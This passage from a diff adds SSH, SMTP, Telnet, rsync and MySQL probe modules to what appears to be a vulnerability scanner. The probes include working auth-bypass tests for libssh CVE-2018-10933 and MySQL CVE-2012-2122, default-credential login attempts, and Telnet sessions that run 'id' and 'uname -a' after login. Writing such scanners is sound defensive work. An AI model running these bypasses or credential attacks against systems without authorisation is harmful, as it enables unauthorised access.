(product_name, version) — product_name matches cve_db product keys. + """ + for pattern, product in self._SSH_LIBRARY_PATTERNS: + m = pattern.search(banner) + if m: + return product, m.group(1) + return None, None + + def _ssh_check_ciphers(self, target, port): + """Audit SSH ciphers, KEX, and MACs via paramiko Transport. + + Returns + ------- + tuple[list[Finding], list[str]] + (findings, weak_algorithm_labels) — findings for probe_result, + labels for the raw-data ``weak_algorithms`` field. 
+ """ + findings = [] + weak_labels = [] + _WEAK_CIPHERS = {"3des-cbc", "blowfish-cbc", "arcfour", "arcfour128", "arcfour256", + "aes128-cbc", "aes192-cbc", "aes256-cbc", "cast128-cbc"} + _WEAK_KEX = {"diffie-hellman-group1-sha1", "diffie-hellman-group14-sha1", + "diffie-hellman-group-exchange-sha1"} + + try: + transport = paramiko.Transport((target, port)) + transport.connect() + sec_opts = transport.get_security_options() + + ciphers = set(sec_opts.ciphers) if sec_opts.ciphers else set() + kex = set(sec_opts.kex) if sec_opts.kex else set() + key_types = set(sec_opts.key_types) if sec_opts.key_types else set() + + # RSA key size check — must be done before transport.close() + try: + remote_key = transport.get_remote_server_key() + if remote_key is not None and remote_key.get_name() == "ssh-rsa": + key_bits = remote_key.get_bits() + if key_bits < 2048: + findings.append(Finding( + severity=Severity.HIGH, + title=f"SSH RSA key is critically weak ({key_bits}-bit)", + description=f"The server's RSA host key is only {key_bits}-bit, which is trivially factorable.", + evidence=f"RSA key size: {key_bits} bits", + remediation="Generate a new RSA key of at least 3072 bits, or switch to Ed25519.", + owasp_id="A02:2021", + cwe_id="CWE-326", + confidence="certain", + )) + weak_labels.append(f"rsa_key: {key_bits}-bit") + elif key_bits < 3072: + findings.append(Finding( + severity=Severity.LOW, + title=f"SSH RSA key below NIST recommendation ({key_bits}-bit)", + description=f"The server's RSA host key is {key_bits}-bit. 
NIST recommends >=3072-bit after 2023.", + evidence=f"RSA key size: {key_bits} bits", + remediation="Generate a new RSA key of at least 3072 bits, or switch to Ed25519.", + owasp_id="A02:2021", + cwe_id="CWE-326", + confidence="certain", + )) + weak_labels.append(f"rsa_key: {key_bits}-bit") + except Exception: + pass + + transport.close() + + # DSA key detection + if "ssh-dss" in key_types: + findings.append(Finding( + severity=Severity.MEDIUM, + title="SSH DSA host key offered (ssh-dss)", + description="The SSH server offers DSA host keys, which are limited to 1024-bit and considered weak.", + evidence=f"Key types: {', '.join(sorted(key_types))}", + remediation="Remove DSA host keys and use Ed25519 or RSA (>=3072-bit) instead.", + owasp_id="A02:2021", + cwe_id="CWE-326", + confidence="certain", + )) + weak_labels.append("key_types: ssh-dss") + + weak_ciphers = ciphers & _WEAK_CIPHERS + weak_kex = kex & _WEAK_KEX + + if weak_ciphers: + cipher_list = ", ".join(sorted(weak_ciphers)) + findings.append(Finding( + severity=Severity.MEDIUM, + title=f"SSH weak ciphers: {cipher_list}", + description="The SSH server offers ciphers considered cryptographically weak.", + evidence=f"Weak ciphers offered: {cipher_list}", + remediation="Disable CBC-mode and RC4 ciphers in sshd_config.", + owasp_id="A02:2021", + cwe_id="CWE-326", + confidence="certain", + )) + weak_labels.append(f"ciphers: {cipher_list}") + + if weak_kex: + kex_list = ", ".join(sorted(weak_kex)) + findings.append(Finding( + severity=Severity.MEDIUM, + title=f"SSH weak key exchange: {kex_list}", + description="The SSH server offers key-exchange algorithms with known weaknesses.", + evidence=f"Weak KEX offered: {kex_list}", + remediation="Disable SHA-1 based key exchange algorithms in sshd_config.", + owasp_id="A02:2021", + cwe_id="CWE-326", + confidence="certain", + )) + weak_labels.append(f"kex: {kex_list}") + + except Exception as e: + self.P(f"SSH cipher audit failed on {target}:{port}: {e}", color='y') + + 
return findings, weak_labels + + def _ssh_check_libssh_bypass(self, target, port): + """Test CVE-2018-10933: libssh auth bypass via premature USERAUTH_SUCCESS. + + Affected versions: libssh 0.6.0–0.8.3 (fixed in 0.7.6 / 0.8.4). + The vulnerability allows a client to send SSH2_MSG_USERAUTH_SUCCESS (52) + instead of a proper auth request, and the server accepts it. + + Returns + ------- + Finding or None + """ + try: + transport = paramiko.Transport((target, port)) + transport.connect() + # SSH2_MSG_USERAUTH_SUCCESS = 52 (0x34) + msg = paramiko.Message() + msg.add_byte(b'\x34') + transport._send_message(msg) + try: + chan = transport.open_session(timeout=3) + if chan is not None: + chan.close() + transport.close() + return Finding( + severity=Severity.CRITICAL, + title="libssh auth bypass (CVE-2018-10933)", + description="Server accepted SSH2_MSG_USERAUTH_SUCCESS from client, " + "bypassing authentication entirely. Full shell access possible.", + evidence="Session channel opened after sending USERAUTH_SUCCESS.", + remediation="Upgrade libssh to >= 0.8.4 or >= 0.7.6.", + owasp_id="A07:2021", + cwe_id="CWE-287", + confidence="certain", + ) + except Exception: + pass + transport.close() + except Exception as e: + self.P(f"libssh bypass check failed on {target}:{port}: {e}", color='y') + return None + + def _service_info_smtp(self, target, port): # default port: 25 + """ + Assess SMTP service security: banner, EHLO features, STARTTLS, + authentication methods, open relay, and user enumeration. + + Checks performed (in order): + + 1. Banner grab — fingerprint MTA software and version. + 2. EHLO — enumerate server capabilities (SIZE, AUTH, STARTTLS, etc.). + 3. STARTTLS support — check for encryption. + 4. AUTH methods — detect available authentication mechanisms. + 5. Open relay test — attempt MAIL FROM / RCPT TO without auth. + 6. VRFY / EXPN — test user enumeration commands. + + Parameters + ---------- + target : str + Hostname or IP address. 
+ port : int + Port being probed. + + Returns + ------- + dict + Structured findings. + """ + import smtplib + + findings = [] + result = { + "banner": None, + "server_hostname": None, + "max_message_size": None, + "auth_methods": [], + } + + # --- 1. Connect and grab banner --- + try: + smtp = smtplib.SMTP(timeout=5) + code, msg = smtp.connect(target, port) + result["banner"] = f"{code} {msg.decode(errors='replace')}" + except Exception as e: + return probe_error(target, port, "SMTP", e) + + # --- 2. EHLO — server capabilities --- + identity = getattr(self, 'scanner_identity', 'probe.redmesh.local') + ehlo_features = [] + try: + code, msg = smtp.ehlo(identity) + if code == 250: + for line in msg.decode(errors="replace").split("\n"): + feat = line.strip() + if feat: + ehlo_features.append(feat) + except Exception: + # Fallback to HELO + try: + smtp.helo(identity) + except Exception: + pass + + # Parse meaningful fields from EHLO response + for idx, feat in enumerate(ehlo_features): + upper = feat.upper() + if idx == 0 and " Hello " in feat: + # First line is the server greeting: "hostname Hello client [ip]" + result["server_hostname"] = feat.split()[0] + if upper.startswith("SIZE "): + try: + size_bytes = int(feat.split()[1]) + result["max_message_size"] = f"{size_bytes // (1024*1024)}MB" + except (ValueError, IndexError): + pass + if upper.startswith("AUTH "): + result["auth_methods"] = feat.split()[1:] + + # --- 2b. Banner timezone extraction --- + banner_text = result["banner"] or "" + _tz_match = _re.search(r'([+-]\d{4})\s*$', banner_text) + if _tz_match: + self._emit_metadata("timezone_hints", {"offset": _tz_match.group(1), "source": f"smtp:{port}"}) + + # --- 2c. Banner / hostname information disclosure --- + # Extract MTA version from banner (e.g. 
"Exim 4.97", "Postfix", "Sendmail 8.x") + version_match = _re.search( + r"(Exim|Postfix|Sendmail|Microsoft ESMTP|hMailServer|Haraka|OpenSMTPD)" + r"[\s/]*([0-9][0-9.]*)?", + banner_text, _re.IGNORECASE, + ) + if version_match: + mta = version_match.group(0).strip() + findings.append(Finding( + severity=Severity.LOW, + title=f"SMTP banner discloses MTA software: {mta} (aids CVE lookup).", + description="The SMTP banner reveals the mail transfer agent software and version.", + evidence=f"Banner: {banner_text[:120]}", + remediation="Remove or genericize the SMTP banner to hide MTA version details.", + owasp_id="A05:2021", + cwe_id="CWE-200", + confidence="certain", + )) + + # CVE check on extracted MTA version + _smtp_product_map = {'exim': 'exim', 'postfix': 'postfix', 'opensmtpd': 'opensmtpd'} + _mta_version = version_match.group(2) if version_match and version_match.group(2) else None + _mta_name = version_match.group(1).lower() if version_match else None + + # If banner lacks version (common with OpenSMTPD), try HELP command + if version_match and not _mta_version: + try: + code, msg = smtp.docmd("HELP") + help_text = msg.decode(errors="replace") if isinstance(msg, bytes) else str(msg) + _help_ver = _re.search(r'(\d+\.\d+(?:\.\d+)*(?:p\d+)?)', help_text) + if _help_ver: + _mta_version = _help_ver.group(1) + except Exception: + pass + + if _mta_name and _mta_version: + _cve_product = _smtp_product_map.get(_mta_name) + if _cve_product: + findings += check_cves(_cve_product, _mta_version) + + if result["server_hostname"]: + # Check if hostname reveals container/internal info + hostname = result["server_hostname"] + if _re.search(r"[0-9a-f]{12}", hostname): + self._emit_metadata("container_ids", {"id": hostname, "source": f"smtp:{port}"}) + findings.append(Finding( + severity=Severity.LOW, + title=f"SMTP hostname leaks container ID: {hostname} (infrastructure disclosure).", + description="The EHLO response reveals a container ID or internal hostname.", + 
evidence=f"Hostname: {hostname}", + remediation="Configure the SMTP server to use a proper FQDN instead of the container ID.", + owasp_id="A05:2021", + cwe_id="CWE-200", + confidence="firm", + )) + if _re.match(r'^[a-z0-9-]+-[a-z0-9]{8,10}$', hostname): + self._emit_metadata("container_ids", {"id": hostname, "source": f"smtp_k8s:{port}"}) + findings.append(Finding( + severity=Severity.LOW, + title=f"SMTP hostname matches Kubernetes pod name pattern: {hostname}", + description="The EHLO hostname resembles a Kubernetes pod name (deployment-replicaset-podid).", + evidence=f"Hostname: {hostname}", + remediation="Configure the SMTP server to use a proper FQDN instead of the pod name.", + owasp_id="A05:2021", + cwe_id="CWE-200", + confidence="firm", + )) + if hostname.endswith('.internal'): + self._emit_metadata("container_ids", {"id": hostname, "source": f"smtp_internal:{port}"}) + findings.append(Finding( + severity=Severity.LOW, + title=f"SMTP hostname uses cloud-internal DNS suffix: {hostname}", + description="The EHLO hostname ends with '.internal', indicating AWS/GCP internal DNS.", + evidence=f"Hostname: {hostname}", + remediation="Configure the SMTP server to use a public FQDN instead of internal DNS.", + owasp_id="A05:2021", + cwe_id="CWE-200", + confidence="firm", + )) + + # --- 3. 
STARTTLS --- + starttls_supported = any("STARTTLS" in f.upper() for f in ehlo_features) + if not starttls_supported: + try: + code, msg = smtp.docmd("STARTTLS") + if code == 220: + starttls_supported = True + except Exception: + pass + + if not starttls_supported: + findings.append(Finding( + severity=Severity.MEDIUM, + title="SMTP does not support STARTTLS (credentials sent in cleartext).", + description="The SMTP server does not offer STARTTLS, leaving credentials and mail unencrypted.", + evidence="STARTTLS not listed in EHLO features and STARTTLS command rejected.", + remediation="Enable STARTTLS support on the SMTP server.", + owasp_id="A02:2021", + cwe_id="CWE-319", + confidence="certain", + )) + + # --- 4. AUTH without credentials --- + if result["auth_methods"]: + try: + code, msg = smtp.docmd("AUTH LOGIN") + if code == 235: + findings.append(Finding( + severity=Severity.HIGH, + title="SMTP AUTH LOGIN accepted without credentials.", + description="The SMTP server accepted AUTH LOGIN without providing actual credentials.", + evidence=f"AUTH LOGIN returned code {code}.", + remediation="Fix AUTH configuration to require valid credentials.", + owasp_id="A07:2021", + cwe_id="CWE-287", + confidence="certain", + )) + except Exception: + pass + + # --- 5. 
Open relay test --- + try: + smtp.rset() + except Exception: + try: + smtp.quit() + except Exception: + pass + try: + smtp = smtplib.SMTP(target, port, timeout=5) + smtp.ehlo(identity) + except Exception: + smtp = None + + if smtp: + try: + code_from, _ = smtp.docmd(f"MAIL FROM:") + if code_from == 250: + code_rcpt, _ = smtp.docmd("RCPT TO:") + if code_rcpt == 250: + findings.append(Finding( + severity=Severity.HIGH, + title="SMTP open relay detected (accepts mail to external domains without auth).", + description="The SMTP server relays mail to external domains without authentication.", + evidence="RCPT TO: accepted (code 250).", + remediation="Configure SMTP relay restrictions to require authentication.", + owasp_id="A01:2021", + cwe_id="CWE-284", + confidence="certain", + )) + smtp.docmd("RSET") + except Exception: + pass + + # --- 6. VRFY / EXPN --- + if smtp: + for cmd_name in ("VRFY", "EXPN"): + try: + code, msg = smtp.docmd(cmd_name, "root") + if code in (250, 251, 252): + findings.append(Finding( + severity=Severity.MEDIUM, + title=f"SMTP {cmd_name} command enabled (user enumeration possible).", + description=f"The {cmd_name} command can be used to enumerate valid users on the system.", + evidence=f"{cmd_name} root returned code {code}.", + remediation=f"Disable the {cmd_name} command in the SMTP server configuration.", + owasp_id="A01:2021", + cwe_id="CWE-203", + confidence="certain", + )) + except Exception: + pass + + if smtp: + try: + smtp.quit() + except Exception: + pass + + return probe_result(raw_data=result, findings=findings) + + def _service_info_telnet(self, target, port): # default port: 23 + """ + Assess Telnet service security: banner, negotiation options, default + credentials, privilege level, system fingerprint, and credential validation. + + Checks performed (in order): + + 1. Banner grab and IAC option parsing. + 2. Default credential check — try common user:pass combos. + 3. Privilege escalation check — report if root shell is obtained. 
+ 4. System fingerprint — run ``id`` and ``uname -a`` on successful login. + 5. Arbitrary credential acceptance test. + + Parameters + ---------- + target : str + Hostname or IP address. + port : int + Port being probed. + + Returns + ------- + dict + Structured findings. + """ + import time as _time + + findings = [] + result = { + "banner": None, + "negotiation_options": [], + "accepted_credentials": [], + "system_info": None, + } + + findings.append(Finding( + severity=Severity.MEDIUM, + title="Telnet service is running (unencrypted remote access).", + description="Telnet transmits all data including credentials in cleartext.", + evidence=f"Telnet port {port} is open on {target}.", + remediation="Replace Telnet with SSH for encrypted remote access.", + owasp_id="A02:2021", + cwe_id="CWE-319", + confidence="certain", + )) + + # --- 1. Banner grab + IAC negotiation parsing --- + try: + sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) + sock.settimeout(5) + sock.connect((target, port)) + raw = sock.recv(2048) + sock.close() + except Exception as e: + return probe_error(target, port, "Telnet", e) + + # Parse IAC sequences + iac_options = [] + cmd_names = {251: "WILL", 252: "WONT", 253: "DO", 254: "DONT"} + opt_names = { + 0: "BINARY", 1: "ECHO", 3: "SGA", 5: "STATUS", + 24: "TERMINAL_TYPE", 31: "WINDOW_SIZE", 32: "TERMINAL_SPEED", + 33: "REMOTE_FLOW", 34: "LINEMODE", 36: "ENVIRON", 39: "NEW_ENVIRON", + } + i = 0 + text_parts = [] + while i < len(raw): + if raw[i] == 0xFF and i + 2 < len(raw): + cmd = cmd_names.get(raw[i + 1], f"CMD_{raw[i+1]}") + opt = opt_names.get(raw[i + 2], f"OPT_{raw[i+2]}") + iac_options.append(f"{cmd} {opt}") + i += 3 + else: + if 32 <= raw[i] < 127: + text_parts.append(chr(raw[i])) + i += 1 + + banner_text = "".join(text_parts).strip() + if banner_text: + result["banner"] = banner_text + elif iac_options: + result["banner"] = "(IAC negotiation only, no text banner)" + else: + result["banner"] = "(no banner)" + 
result["negotiation_options"] = iac_options + + # --- 2–4. Default credential check with system fingerprint --- + def _try_telnet_login(user, passwd): + """Attempt Telnet login, return (success, uid_line, uname_line).""" + try: + s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) + s.settimeout(5) + s.connect((target, port)) + + # Read until login prompt + buf = b"" + deadline = _time.time() + 5 + while _time.time() < deadline: + try: + chunk = s.recv(1024) + if not chunk: + break + buf += chunk + if b"login:" in buf.lower() or b"username:" in buf.lower(): + break + except socket.timeout: + break + + if b"login:" not in buf.lower() and b"username:" not in buf.lower(): + s.close() + return False, None, None + + s.sendall(user.encode() + b"\n") + + # Read until password prompt + buf = b"" + deadline = _time.time() + 5 + while _time.time() < deadline: + try: + chunk = s.recv(1024) + if not chunk: + break + buf += chunk + if b"assword:" in buf: + break + except socket.timeout: + break + + if b"assword:" not in buf: + s.close() + return False, None, None + + s.sendall(passwd.encode() + b"\n") + _time.sleep(1.5) + + # Read response + resp = b"" + try: + while True: + chunk = s.recv(4096) + if not chunk: + break + resp += chunk + except socket.timeout: + pass + + resp_text = resp.decode("utf-8", errors="replace") + + # Check for login failure indicators + fail_indicators = ["incorrect", "failed", "denied", "invalid", "login:"] + if any(ind in resp_text.lower() for ind in fail_indicators): + s.close() + return False, None, None + + # Login succeeded — try to get system info + uid_line = None + uname_line = None + try: + s.sendall(b"id\n") + _time.sleep(0.5) + id_resp = s.recv(2048).decode("utf-8", errors="replace") + for line in id_resp.replace("\r\n", "\n").split("\n"): + cleaned = line.strip() + # Remove ANSI/control sequences + import re + cleaned = re.sub(r"\x1b\[[0-9;]*[a-zA-Z]", "", cleaned) + if "uid=" in cleaned: + uid_line = cleaned + break + except Exception: 
+ pass + + try: + s.sendall(b"uname -a\n") + _time.sleep(0.5) + uname_resp = s.recv(2048).decode("utf-8", errors="replace") + for line in uname_resp.replace("\r\n", "\n").split("\n"): + cleaned = line.strip() + import re + cleaned = re.sub(r"\x1b\[[0-9;]*[a-zA-Z]", "", cleaned) + if "linux" in cleaned.lower() or "unix" in cleaned.lower() or "darwin" in cleaned.lower(): + uname_line = cleaned + break + except Exception: + pass + + s.close() + return True, uid_line, uname_line + + except Exception: + return False, None, None + + system_info_captured = False + for user, passwd in _TELNET_DEFAULT_CREDS: + success, uid_line, uname_line = _try_telnet_login(user, passwd) + if success: + result["accepted_credentials"].append(f"{user}:{passwd}") + findings.append(Finding( + severity=Severity.CRITICAL, + title=f"Telnet default credential accepted: {user}:{passwd}", + description="The Telnet server accepted a well-known default credential.", + evidence=f"Accepted credential: {user}:{passwd}", + remediation="Change default passwords immediately and enforce strong credential policies.", + owasp_id="A07:2021", + cwe_id="CWE-798", + confidence="certain", + )) + # Check for root access + if uid_line and "uid=0" in uid_line: + findings.append(Finding( + severity=Severity.CRITICAL, + title=f"Root shell access via Telnet with {user}:{passwd}.", + description="Root-level shell access was obtained over an unencrypted Telnet session.", + evidence=f"uid=0 in id output: {uid_line}", + remediation="Disable root login via Telnet; use SSH with key-based auth instead.", + owasp_id="A07:2021", + cwe_id="CWE-250", + confidence="certain", + )) + + # Capture system info once + if not system_info_captured and (uid_line or uname_line): + parts = [] + if uid_line: + parts.append(uid_line) + if uname_line: + parts.append(uname_line) + result["system_info"] = " | ".join(parts) + system_info_captured = True + + # --- 5. 
Arbitrary credential acceptance test --- + import string as _string + ruser = "".join(random.choices(_string.ascii_lowercase, k=8)) + rpass = "".join(random.choices(_string.ascii_letters + _string.digits, k=12)) + success, _, _ = _try_telnet_login(ruser, rpass) + if success: + findings.append(Finding( + severity=Severity.CRITICAL, + title="Telnet accepts arbitrary credentials", + description="Random credentials were accepted, indicating a dangerous misconfiguration or deceptive service.", + evidence=f"Accepted random creds {ruser}:{rpass}", + remediation="Investigate immediately — authentication is non-functional.", + owasp_id="A07:2021", + cwe_id="CWE-287", + confidence="certain", + )) + + return probe_result(raw_data=result, findings=findings) + + + def _service_info_rsync(self, target, port): # default port: 873 + """ + Rsync service probe: version handshake, module enumeration, auth check. + + Checks performed: + + 1. Banner grab — extract rsync protocol version. + 2. Module enumeration — ``#list`` to discover available modules. + 3. Auth check — connect to each module to test unauthenticated access. + + Parameters + ---------- + target : str + Hostname or IP address. + port : int + Port being probed. + + Returns + ------- + dict + Structured findings. + """ + findings = [] + raw = {"version": None, "modules": []} + + # --- 1. 
Connect and receive banner --- + try: + sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) + sock.settimeout(3) + sock.connect((target, port)) + banner = sock.recv(256).decode("utf-8", errors="ignore").strip() + except Exception as e: + return probe_error(target, port, "rsync", e) + + if not banner.startswith("@RSYNCD:"): + try: + sock.close() + except Exception: + pass + findings.append(Finding( + severity=Severity.INFO, + title=f"Port {port} open but no rsync banner", + description=f"Expected @RSYNCD banner, got: {banner[:80]}", + confidence="tentative", + )) + return probe_result(raw_data=raw, findings=findings) + + # Extract protocol version + proto_version = banner.split(":", 1)[1].strip().split()[0] if ":" in banner else None + raw["version"] = proto_version + + findings.append(Finding( + severity=Severity.LOW, + title=f"Rsync service detected (protocol {proto_version})", + description=f"Rsync daemon is running on {target}:{port}.", + evidence=f"Banner: {banner}", + remediation="Restrict rsync access to trusted networks; require authentication for all modules.", + cwe_id="CWE-200", + confidence="certain", + )) + + # --- 2. 
Module enumeration --- + try: + # Send matching version handshake + list request + sock.sendall(f"@RSYNCD: {proto_version}\n".encode()) + sock.sendall(b"#list\n") + # Read module listing until @RSYNCD: EXIT + module_data = b"" + while True: + chunk = sock.recv(4096) + if not chunk: + break + module_data += chunk + if b"@RSYNCD: EXIT" in module_data: + break + sock.close() + + modules = [] + for line in module_data.decode("utf-8", errors="ignore").splitlines(): + line = line.strip() + if line.startswith("@RSYNCD:") or not line: + continue + # Format: "module_name\tdescription" or just "module_name" + parts = line.split("\t", 1) + mod_name = parts[0].strip() + mod_desc = parts[1].strip() if len(parts) > 1 else "" + if mod_name: + modules.append({"name": mod_name, "description": mod_desc}) + + raw["modules"] = modules + + if modules: + mod_names = ", ".join(m["name"] for m in modules) + findings.append(Finding( + severity=Severity.HIGH, + title=f"Rsync module enumeration successful: {mod_names}", + description=f"Rsync on {target}:{port} exposes {len(modules)} module(s). " + "Exposed modules may allow file read/write.", + evidence=f"Modules: {mod_names}", + remediation="Restrict module listing and require authentication for all rsync modules.", + owasp_id="A01:2021", + cwe_id="CWE-200", + confidence="certain", + )) + except Exception as e: + self.P(f"Rsync module enumeration failed on {target}:{port}: {e}", color='y') + try: + sock.close() + except Exception: + pass + + # --- 3. 
Test unauthenticated access per module --- + for mod in raw["modules"]: + try: + sock2 = socket.socket(socket.AF_INET, socket.SOCK_STREAM) + sock2.settimeout(3) + sock2.connect((target, port)) + sock2.recv(256) # banner + sock2.sendall(f"@RSYNCD: {proto_version}\n".encode()) + sock2.sendall(f"{mod['name']}\n".encode()) + resp = sock2.recv(4096).decode("utf-8", errors="ignore") + sock2.close() + + if "@RSYNCD: OK" in resp: + findings.append(Finding( + severity=Severity.CRITICAL, + title=f"Rsync module '{mod['name']}' accessible without authentication", + description=f"Module '{mod['name']}' on {target}:{port} allows unauthenticated access. " + "An attacker can read or write arbitrary files within this module.", + evidence=f"Connected to module '{mod['name']}', received @RSYNCD: OK", + remediation=f"Add 'auth users' and 'secrets file' to the [{mod['name']}] section in rsyncd.conf.", + owasp_id="A01:2021", + cwe_id="CWE-284", + confidence="certain", + )) + elif "@ERROR" in resp and "auth" in resp.lower(): + raw["modules"] = [ + {**m, "auth_required": True} if m["name"] == mod["name"] else m + for m in raw["modules"] + ] + except Exception: + pass + + return probe_result(raw_data=raw, findings=findings) diff --git a/extensions/business/cybersec/red_mesh/worker/service/database.py b/extensions/business/cybersec/red_mesh/worker/service/database.py new file mode 100644 index 00000000..ea38f889 --- /dev/null +++ b/extensions/business/cybersec/red_mesh/worker/service/database.py @@ -0,0 +1,1305 @@ +import re as _re +import socket +import struct + +import requests + +from ...findings import Finding, Severity, probe_result, probe_error +from ...cve_db import check_cves +from ._base import _ServiceProbeBase + + +class _ServiceDatabaseMixin(_ServiceProbeBase): + """MySQL, Redis, MSSQL, PostgreSQL, Memcached, MongoDB, CouchDB and InfluxDB probes.""" + + def _service_info_mysql(self, target, port): # default port: 3306 + """ + MySQL handshake probe: extract version, auth plugin, 
and check CVEs. + + Parameters + ---------- + target : str + Hostname or IP address. + port : int + Port being probed. + + Returns + ------- + dict + Structured findings. + """ + findings = [] + raw = {"version": None, "auth_plugin": None} + try: + sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) + sock.settimeout(3) + sock.connect((target, port)) + data = sock.recv(256) + sock.close() + + if data and len(data) > 4: + # MySQL protocol: first byte of payload is protocol version (0x0a = v10) + pkt_payload = data[4:] # skip 3-byte length + 1-byte seq + if pkt_payload and pkt_payload[0] == 0x0a: + version = pkt_payload[1:].split(b'\x00')[0].decode('utf-8', errors='ignore') + raw["version"] = version + + # Extract auth plugin name (at end of handshake after capabilities/salt) + try: + parts = pkt_payload.split(b'\x00') + if len(parts) >= 2: + last = parts[-2].decode('utf-8', errors='ignore') if parts[-1] == b'' else parts[-1].decode('utf-8', errors='ignore') + if 'mysql_native' in last or 'caching_sha2' in last or 'sha256' in last: + raw["auth_plugin"] = last + except Exception: + pass + + findings.append(Finding( + severity=Severity.LOW, + title=f"MySQL version disclosed: {version}", + description=f"MySQL {version} handshake received on {target}:{port}.", + evidence=f"version={version}, auth_plugin={raw['auth_plugin']}", + remediation="Restrict MySQL to trusted networks; consider disabling version disclosure.", + confidence="certain", + )) + + # Salt entropy check — extract 20-byte auth scramble from handshake + try: + import math + # After version null-terminated string: 4 bytes thread_id + 8 bytes salt1 + after_version = pkt_payload[1:].split(b'\x00', 1)[1] + if len(after_version) >= 12: + salt1 = after_version[4:12] # 8 bytes after thread_id + # Salt part 2: after capabilities(2)+charset(1)+status(2)+caps_upper(2)+auth_len(1)+reserved(10) + salt2 = b'' + if len(after_version) >= 31: + salt2 = after_version[31:43].rstrip(b'\x00') + full_salt = salt1 + salt2 + 
if len(full_salt) >= 8: + # Shannon entropy + byte_counts = {} + for b in full_salt: + byte_counts[b] = byte_counts.get(b, 0) + 1 + entropy = 0.0 + n = len(full_salt) + for count in byte_counts.values(): + p = count / n + if p > 0: + entropy -= p * math.log2(p) + raw["salt_entropy"] = round(entropy, 2) + if entropy < 2.0: + findings.append(Finding( + severity=Severity.HIGH, + title=f"MySQL salt entropy critically low ({entropy:.2f} bits)", + description="The authentication scramble has abnormally low entropy, " + "suggesting a non-standard or deceptive MySQL service.", + evidence=f"salt_entropy={entropy:.2f}, salt_hex={full_salt.hex()[:40]}", + remediation="Investigate this MySQL instance — authentication randomness is insufficient.", + cwe_id="CWE-330", + confidence="firm", + )) + except Exception: + pass + + # CVE check + findings += check_cves("mysql", version) + else: + raw["protocol_byte"] = pkt_payload[0] if pkt_payload else None + findings.append(Finding( + severity=Severity.INFO, + title="MySQL port open (non-standard handshake)", + description=f"Port {port} responded but protocol byte is not 0x0a.", + confidence="tentative", + )) + else: + findings.append(Finding( + severity=Severity.INFO, + title="MySQL port open (no banner)", + description=f"No handshake data received on {target}:{port}.", + confidence="tentative", + )) + except Exception as e: + return probe_error(target, port, "MySQL", e) + + return probe_result(raw_data=raw, findings=findings) + + def _service_info_mysql_creds(self, target, port): # default port: 3306 + """ + MySQL default credential testing (opt-in via active_auth feature group). + + Attempts mysql_native_password auth with a small list of default credentials. + + Parameters + ---------- + target : str + Hostname or IP address. + port : int + Port being probed. + + Returns + ------- + dict + Structured findings. 
+ """ + import hashlib + + findings = [] + raw = {"tested_credentials": 0, "accepted_credentials": []} + creds = [("root", ""), ("root", "root"), ("root", "password")] + + for username, password in creds: + try: + sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) + sock.settimeout(3) + sock.connect((target, port)) + data = sock.recv(256) + + if not data or len(data) < 4: + sock.close() + continue + + pkt_payload = data[4:] + if not pkt_payload or pkt_payload[0] != 0x0a: + sock.close() + continue + + # Extract salt (scramble) from handshake + parts = pkt_payload[1:].split(b'\x00', 1) + rest = parts[1] if len(parts) > 1 else b'' + # Salt part 1: bytes 4..11 after capabilities (skip 4 bytes capabilities + 1 byte filler) + if len(rest) >= 13: + salt1 = rest[5:13] + else: + sock.close() + continue + # Salt part 2: after reserved bytes (skip 2+2+1+10 reserved = 15) + salt2 = b'' + if len(rest) >= 28: + salt2 = rest[28:40].rstrip(b'\x00') + salt = salt1 + salt2 + + # mysql_native_password auth response + if password: + sha1_pass = hashlib.sha1(password.encode()).digest() + sha1_sha1 = hashlib.sha1(sha1_pass).digest() + sha1_salt_sha1sha1 = hashlib.sha1(salt + sha1_sha1).digest() + auth_data = bytes(a ^ b for a, b in zip(sha1_pass, sha1_salt_sha1sha1)) + else: + auth_data = b'' + + # Build auth response packet + client_flags = struct.pack('= 5: + resp_type = resp[4] + if resp_type == 0x00: # OK packet + cred_str = f"{username}:{password}" if password else f"{username}:(empty)" + raw["accepted_credentials"].append(cred_str) + findings.append(Finding( + severity=Severity.CRITICAL, + title=f"MySQL default credential accepted: {cred_str}", + description=f"MySQL on {target}:{port} accepts {cred_str}.", + evidence=f"Auth response OK for {cred_str}", + remediation="Change default passwords and restrict access.", + owasp_id="A07:2021", + cwe_id="CWE-798", + confidence="certain", + )) + except Exception: + continue + + if not findings: + findings.append(Finding( + 
severity=Severity.INFO, + title="MySQL default credentials rejected", + description=f"Tested {raw['tested_credentials']} credential pairs, all rejected.", + confidence="certain", + )) + + # --- CVE-2012-2122 auth bypass test --- + # Affected: MySQL 5.1.x < 5.1.63, 5.5.x < 5.5.25, MariaDB < 5.5.23 + # Bug: memcmp return value truncation means ~1/256 chance of auth bypass + cve_bypass = self._mysql_test_cve_2012_2122(target, port) + if cve_bypass: + findings.append(cve_bypass) + raw["cve_2012_2122"] = True + + return probe_result(raw_data=raw, findings=findings) + + # Affected version ranges for CVE-2012-2122 + _MYSQL_CVE_2012_2122_RANGES = [ + ((5, 1, 0), (5, 1, 63)), # MySQL 5.1.x < 5.1.63 + ((5, 5, 0), (5, 5, 25)), # MySQL 5.5.x < 5.5.25 + ] + + def _mysql_test_cve_2012_2122(self, target, port): + """Test for MySQL CVE-2012-2122 timing-based authentication bypass. + + On affected versions, memcmp() return value is cast to char, giving + a ~1/256 chance that any password is accepted. 300 attempts gives + ~69% probability of detection. + + Returns + ------- + Finding or None + CRITICAL finding if bypass confirmed, None otherwise. 
+ """ + import hashlib + import random + + # First, connect to get version + try: + sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) + sock.settimeout(3) + sock.connect((target, port)) + data = sock.recv(256) + sock.close() + except Exception: + return None + + if not data or len(data) < 5: + return None + pkt_payload = data[4:] + if not pkt_payload or pkt_payload[0] != 0x0a: + return None + + version_str = pkt_payload[1:].split(b'\x00')[0].decode('utf-8', errors='ignore') + version_tuple = tuple(int(x) for x in _re.findall(r'\d+', version_str)[:3]) + if len(version_tuple) < 3: + return None + + # Check if version is in affected range + affected = False + for low, high in self._MYSQL_CVE_2012_2122_RANGES: + if low <= version_tuple < high: + affected = True + break + if not affected: + return None + + # Attempt rapid auth with random passwords + self.P(f"MySQL {version_str} in CVE-2012-2122 range — testing auth bypass ({target}:{port})", color='y') + attempts = 300 + + try: + sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) + sock.settimeout(5) + sock.connect((target, port)) + + for 